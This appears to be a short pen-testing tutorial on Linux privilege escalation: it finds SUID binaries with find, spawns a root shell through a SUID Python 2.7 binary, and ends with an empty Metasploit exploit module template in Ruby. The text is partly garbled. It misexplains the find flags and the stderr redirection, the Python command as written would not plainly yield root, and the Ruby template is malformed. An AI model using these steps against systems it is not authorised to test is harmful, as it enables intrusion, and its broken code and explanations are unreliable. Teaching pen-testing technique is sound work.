Searching for binaries for privilege escalation exploit

During the attacking phase of a pen test once access has been gained to a shell, we can try to own the system through a privilege escalation exploit in order to obtain root access. We can verify the system identification of the user by using the following command to ascertain SUID permissions:

$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)

Then we can use the following command, to find a list of executable file SUID permissions on the system:

find / -perm -u=s -type f 2>/dev/null

Here, the find command will search from root (/) looking for user SUID permissions configured to execute (-perm -u=s), and to find directories (-type f). The result of this search, will be redirected to standard error and use a null device to suppress output (2>/dev/null).

Example show below:

$ find / -perm -u=s 2>/dev/null

Note that if redirect to stdout (>) or (1>) was used instead of stderr (2>), we would see a list of permission denied errors. As given from the above example, we could look to use Python2.7 binary in an attempt to gain root access using a privilege escalation exploit. We can use the following command to achieve this in using our above example:

/usr/bin/python2.7 -c ‘import pty;pty.spawn(“/bin/sh”)’

This command will get a TTY shell after a reverse shell connection using Python2.7. This should result in the system permitting root access, and this can be seen from the following commands:

# id
uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
# whoami

We can see that the system user now has root access, denoted from the above by euid=0(root) and root identified from whoami command.

Metasploit Exploit Module Template (Ruby)

# This module requires Metasploit:
# Current source:

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking def initialize(info={}) super(update_info(info, 'Name' => "[Vendor] [Software] [Root Cause] [Vulnerability type]",
'Description' => %q{
Say something that the user might need to know
'License' => MSF_LICENSE,
'Author' => [ 'Name' ],
'References' =>
[ 'URL', '' ]
'Platform' => 'win',
'Targets' =>
[ 'System or software version',
'Ret' => 0x41414141 # This will be available in `target.ret`
'Payload' =>
'BadChars' => "\x00"
'Privileged' => false,
'DisclosureDate' => "",
'DefaultTarget' => 0))

def check
# For the check command

def exploit
# Main function